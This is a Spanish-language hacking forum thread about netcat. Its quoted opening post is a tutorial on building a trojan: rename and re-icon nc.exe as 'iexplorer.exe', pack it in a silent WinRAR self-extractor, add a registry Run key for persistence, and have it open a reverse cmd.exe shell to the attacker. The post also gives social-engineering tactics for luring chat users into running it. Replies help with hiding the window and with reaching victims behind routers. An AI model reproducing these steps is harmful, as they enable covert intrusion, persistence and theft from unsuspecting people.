Jugando con netcat

Iniciado por WHK, 25 Marzo 2007, 03:17 AM

0 Miembros y 1 Visitante están viendo este tema.

D4RIO

No uso el messenger, menos para esto. Podes usar mjes privados en el foro para contactarte conmigo, o este mismo hilo, y me vas a econtrar más seguido, de otra forma tal vez me cruces en el IRC, en FreeNode, en algun canal de debian, linux o cosas por el estilo... si me cruzas es pura casualidad.

Primero leete esto:
http://es.wikipedia.org/wiki/TCP/IP
http://es.wikipedia.org/wiki/UDP
http://en.wikipedia.org/wiki/Netcat
http://es.wikipedia.org/wiki/Netcat

Y vas a estar más informado sobre el tema. Después planteate: ¿Hay routers o Firewalls en la red que puedan impedir la conexion?

Por ultimo, vuelvo a pedirte: ¿Me explicas cual es exactamente el problema?
OpenBSDFreeBSD

D4RIO

usa el boton "buscar" y encontraras lo que bucabas, porque ya se ha hablado en repetidas ocasiones en éste mismo hilo. La opcion más simple para que no salga la "ventanita" al ejecutarse el sfx es usar un vbs que actue de intermediario (usa buscar y encontraras esto), aunque yo prefiero hacerlo desde otro programa previamente hecho en AutoIt, C, C++ o cualquier otro, siendo preferible en alguno chiquito como HLA (High Level Assembler).
El tema de la conexión deberás revisarlo a base de pings, comprobaciónes, tracebacks y otros. Es el preciso momento en el que debes perfeccionar tus técnicas leyendo horas y horas, o hacer lo que hace la mayoría: Desfallecer y conformarse con decir ser hacker deshonrando el nombe y vendiendo software ilegal (Esperemos no seas de estos ultimos)
OpenBSDFreeBSD

Elendil8379

excelente post sobre netcat habia hecho algo parecido con un software alternativo al vnc muy weno saludos desde Venezuela
"El 17 de Septiembre de 1991 comenzó la era de la libertad, Todos somos libres a la hora de elegir lo que queremos ya Yo elegí........"

nuflaco

hola!! soy recien llegado a este foro, la verdad q encontre varias cosas muy interesantes, pero aqui mi inquietud:

Hay alguna manera de acceder con el netcat a una shell en una maquina remota que esta a la vez dentro de una lan, pero sin redireccionar los puertos del router manualmente?

El caso seria asi: tenemos una red de x maquinas, administradas por un router que les da ip y acceso a internet (claro...). Desde una maquina ajena a esta red, quiero abrir una shell de una de las maquinas de de la red, a traves de internet, pero, como todos sabemos, tengo q redireccionar los puertos en el router asi mi peticion es enviada directo a la maquina victima, sino se muere en el router. Como puedo hacer esto sin tener que crear las reglas manualmente? hay alguna manera con UPnP o algo de eso?

Muchisimas gracias a todos!

leogtz

Código (perl) [Seleccionar]

(( 1 / 0 )) &> /dev/null || {
echo -e "stderrrrrrrrrrrrrrrrrrr";
}

http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com

miau30

Buenas!
he estado poniendo en práctica esto del netcat, y me he encontrado con un problema. Me es imposible crear el programa que me conectará con "la victima". Resulta que al poner en dos c:\>WINDOWS>nc -vv -L -p 80, me pone algo como "windows no se reconoce como un comando interno o externo, programa o archivo por lotes ejecutables". En realidad os pediría que alguien me explicara de modo breve como se hace este paso. Perdonar mi ignorancia, pero soy un auténtico novato en esto.

Muchas gracias y saludos.

leogtz

Pueden ser estas dos :

-Te estas equivocando en la sintaxis.
-No tienes a Netcat(nc.exe) en C:\Windows o en C:\windows\System32 (Colocalo en alguno de esas dos rutas).

Y pos si te sale Acceso Denegado, es por tu Antivirus.

Saludos.
Código (perl) [Seleccionar]

(( 1 / 0 )) &> /dev/null || {
echo -e "stderrrrrrrrrrrrrrrrrrr";
}

http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com

D4RIO

El problema es que queres usar netcat y no sabes usar CMD... Windows no lo tenes que poner  :¬¬
OpenBSDFreeBSD

CRISTIAN_DAVID

Cita de: WHK en 25 Marzo 2007, 03:17 AM

JUGANDO CON NETCAT V1.1
                Parte I


Como ya les habrán enseñado a utilizar el netcat, ahora yo les quiero enseñar como sacarle el jugo a este programilla muy útil... lo convertiremos desde un troyano hasta un cliente SMTP entre otras cosas.


TROYANIZANDO NETCAT

Como ya saben, con netcat puedes tomar una shell directamente o realizar una conexión inversa indicando mi IP o dirección DNS (para los que no saben lo que es un DNS... es un tipo de traducción que hace mas fácil poder encontrar tu PC, por ejemplo la IP 200.32.22.25 sería el DNS = pagina.cl ).

Bueno... primero hay que saber lo que vamos a hacer... la idea principal será tomar una shell de la PC de cualquier persona de un IRC (Chat).

Materiales:
ResHacker
Netcat v1.1
Winrar (Modo grafico)
Un icono de Internet Explorer.

Bueno, si no saben donde encontrar el icono tratare de dárselos con este documento XD si no se puede pueden usar cualquier otro icono (puedes hacerlo sin iconos también pero se verá sospechoso.)

Lo primero es conectarse a un Chat XD y conseguirse a alguna victima (ojala no lo hagan con sus novias porque si los pillan los van a patear XD ) ... una ves que digan.. "esa es mi victimaaaaa!!!"  entonces usaremos algo que se llama ingeniería social y es a través del ingenio propio hacerse pasar por alguien o hacerse de la amistad de esa persona para poder obtener lo que queremos, la idea es que hablaremos con el y bla bla bla de donde eres bla bla bla... cuando termines le dices que otro día seguimos conversando... si todo va bien ps ya mañana tendrás la confianza suficiente como para darle un programa que le ayudará en el mantenimiento de su PC o que simplemente se divierta con un juego XD.

Dejamos de lado el Chat y en la noche nos ponemos a hacer el troyano de la siguiente forma:

Paso 1: Primero le cambiamos el icono para que sea menos sospechoso con el ResHacker:



En primer lugar abres el ResHacker y le das en "File/Open" y buscas el netcat. Después pinchas en acción y luego en "Add a new Resource", luego se verá la ventana que ves a la derecha y presionas donde dice "Open file with new resource" (paso 3) para buscar el icono que teniamos, luego donde dice "Resource Name" Debes escribir la palabra "ICON" tal como se ve en la foto y para finalizar presionamos en "Add Resource" y en "File/Save". Con todo esto te creará un respaldo del netcat original que puedes borrarlo con toda tranquilidad y al refrescar la pantalla (F5)  veras que el netcat tiene el mismo icono de Internet Explorer XD



Paso 2: renombramos nc.exe y desde ahora se llamará "iexplorer.exe" XD, luego pinchas el netcat con el botón derecho de tu Mouse y deberá aparecer algo así (obviamente después de haber instalado el winrar.)



Luego aparecerá el Winrar y empezaremos a crear nuestro troyano:

1.



Donde dice "Nombre del archivo" le escribimos "carnada.exe" (por ahora), el formato debe ser en "RAR" el método de compresión el mejor y por último y mas importante "Crear un archivo SFX", el resto debe quedas deseleccionado.


2.



En la pestaña "Avanzado" (arriba) debes pinchar el botón llamado "Opciones SFX" y comenzaremos a configurar nuestro Winrar SFX.


3.



Ahora en "Carpeta de extracción" le diremos que descomprima el netcat (con nombre de iexplorer) en el directorio = %homedrive%%homepath%\update , ahora me diran: "Que es esto?!!"... %homedrive% significa que se descomprimirá dentro de la misma unidad de disco que esté Windows, o sea comúnmente (no siempre) "C:\" ... %homepath% significa "Documents and settings\tu usuario actual" en conclusión se descomprimirá dentro del directorio raiz del usuario donde es casi el único lugar donde un usuario sin derechos de administrador puede sobrescribir, en otras palabras si le hubiese escrito %windir%\system32 pudiera haber tenido fallas al descomprimirse ya que no todos tienen derecho a ese directorio. Elegí una carpeta llamada update para llamar menos la atención.
En "Ejecutar tras la extracción" le escribimos esto = iexplorer.exe -d -e cmd.exe [aca va nuestra ip] 80 , yo le puse la dirección 127.0.0.1 para pruebas pero ustedes le ponen la ip real que sale a Internet. 80 es el puerto donde el troyano se conectará con nosotros.

En "Ejecutar antes de la extracción" le escribimos lo siguiente = %windir%\system32\cmd /c reg add HKcU\Software\Microsoft\Windows\CurrentVersion\Run /v "iexplorer" /t REG_SZ /d "%homedrive%%homepath%\update\iexplorer.exe -d -e cmd.exe 127.0.0.1 80" /f > nul ... y ustedes me diran que es eso!!!!... le decimos que ejecute la consola de comandos CMD y llame a un ejecutable llamado "REG.EXE" el cual se encargará de agregar nuestra entrada al registro del sistema para que el troyano arranque solito cada ves que encienda la pc (recordar que donde dice 127.0.0.1 deben poner la ip de ustedes o en algunos casos (para los que saben) su DNS... es mas efectivo. (Consultar por el no-ip) y donde dice >nul significa que la victima no verá mas que un simple pestañazo del DOS en ves de mostrar todo lo que se está ejecutando.


4.



Acá estamos pidiendo a winrar que no muestre nada mientras se instala todo esto, asi será mas silencioso, rápido y automatizado.


5.



Por último cargamos un icono atractivo para que se vea con el troyano ya compilado y aceptamos todas las ventanas.


Debería quedar algo así:



Yo le puse icono de yahoo porque lo voy a probar desde el mismo Chat.


Ahora vamos a crear el programa que nos conectará con la victima, y se llama "Cliente"
Solo ejecutamos esto y estaremos listos para recibir la conexión de quien abra la carnada:



Y listo :D ahora solo falta visitar a nuestro amigo del día anterior y decirle que tienes un juego muy chido o que tienes algo para no se... usa tu imaginación. En mi caso y entré a una sala de yahoo y como hoy en día esta muy de moda los booters XD puse en sala que bajaran un antibooter para que no los pudieran sacar de la sala y les pase un link con la dirección donde estaba alojado el troyano. En resumidas cuentas... si alguien cae en tus maldades te debe aparecer esto:



Habrás tomado la shell de otra PC (manejar una shell de otra pc significa poder controlar el DOS de Windows o la shell de GNU.. es poder controlar la consola de comandos de la otra persona y a través de eso puedes subirle archivos, borrarle cosas, darle troyanos que te permitan ver su escritorio... mirar sus contraseñas volcando el registro en textos y asíéndoles un "type"... para los que saben un poquitito mas.. talvez saltar a otras pc con netbios, exploits como el dcom, acceder a servidores y dominar una red completa y ufff.. a volar la imaginación. Si no me creen miren estas tres capturas jugando con netcat XD nada serio:


1. El sueño de todo lamer XD :




2. Subiendo RealVnc4 para poder hacer una conexión iversa y mirar el escritorio de la otra persona:




3. Esto fue un ajuste de cuentas XD:




Les mostré como crear un troyano con netcat (indetectable por todos los antivirus por ahora) también puede hacerse con una conexión directa en ves de una inversa como la hice acá, así como ya saben hacerlo ;)

Esto es todo y espero poder mostrarles la próxima ves.. como convertir el Netcat v1.1 en un cliente SMTP para enviar correos automatizados y temporizados además de servir como cliente FTP con comandos automatizados sin la necesidad de la intervención de escribir los comandos desde la consola, también como ponerle contraseña a una sesión de shell con netcat entre muchas otras cosas mas ;)

Video ahún mas explicativo: http://whk.h4ck1ng.net/
El video está en la sección de descargas.

Preguntas mas frecuentes:
¿Porque me aparece que el archivo no existe?
R: http://foro.elhacker.net/index.php/topic,159799.msg860791.html#msg860791

¿Porque me dice error win32?
R: Estas intentando cambiar el icono al netcat V1.1, intenta con el 1.0

¿Porque me dice ""nc" no es un comando reconocido"?
R: http://foro.elhacker.net/index.php/topic,159799.msg758631.html#msg758631

¿Porque me aparece "h_errno 11001: HOST_NOT_FOUND" ?
R: http://foro.elhacker.net/index.php/topic,159799.msg754376.html#msg754376

Salu2 Att. Yan.
Unilola Software.




OYE MNE HARIAS EL FAVIR DE ENVIARME LAS DIRECCIONES DONDE PUEDO ENCONTRAR ESOS PROGRAMAS
Y ES QUE ESTUVE LEYENDO Y NO ENCONTRE COMO USAR EL NETCAT
TE SOLICITARIA UNA AYUDITA SI PLIS GRACXIE
ESO SIENDO TODO ME DESPIDO
BN LUNAS Y SAG ETERNA
'Del putas que los regalos del niño Dios, fueran del niño Dios.

Del putas que la droga más adictiva del mundo fuera el caldito de pollo.

Del putas que nadie se creyera el putas.

Del putas que dentro de los muñecos de Disneylandia no hubiera seres humanos.


Del putas que los taxistas tuvieran vueltas.

Del putas que los consejos que uno le da a otro los escuche uno mismo.

Martín Fierro

Cita de: nuflaco en 10 Junio 2008, 05:12 AM
hola!! soy recien llegado a este foro, la verdad q encontre varias cosas muy interesantes, pero aqui mi inquietud:

Hay alguna manera de acceder con el netcat a una shell en una maquina remota que esta a la vez dentro de una lan, pero sin redireccionar los puertos del router manualmente?

El caso seria asi: tenemos una red de x maquinas, administradas por un router que les da ip y acceso a internet (claro...). Desde una maquina ajena a esta red, quiero abrir una shell de una de las maquinas de de la red, a traves de internet, pero, como todos sabemos, tengo q redireccionar los puertos en el router asi mi peticion es enviada directo a la maquina victima, sino se muere en el router. Como puedo hacer esto sin tener que crear las reglas manualmente? hay alguna manera con UPnP o algo de eso?

Muchisimas gracias a todos!

Usa hamachi, es un software que te permite crear redes vpn la única pega es que tendrás que instalarlo y asociar la pc a la que quieras acceder a una red virtual hamachi, el programa te dará una ip virtual a la que deberás conectarte desde el remoto, claro el remoto también deberá tener instalado el hamachi y pertenecer a la misma red que la otra, así que si dejas un puerto abierto con nc, podrás acceder comodamente desde el remoto con la ip virtual.

¿A poco creías que el Hamachi solo sirve para jugar online? Tiene mil y un uso si lo asocias a otros programas maravillosos como el nc, y es por decir algo, vnc y cualquier troyano que te abra un puerto..
Y no me importa nada..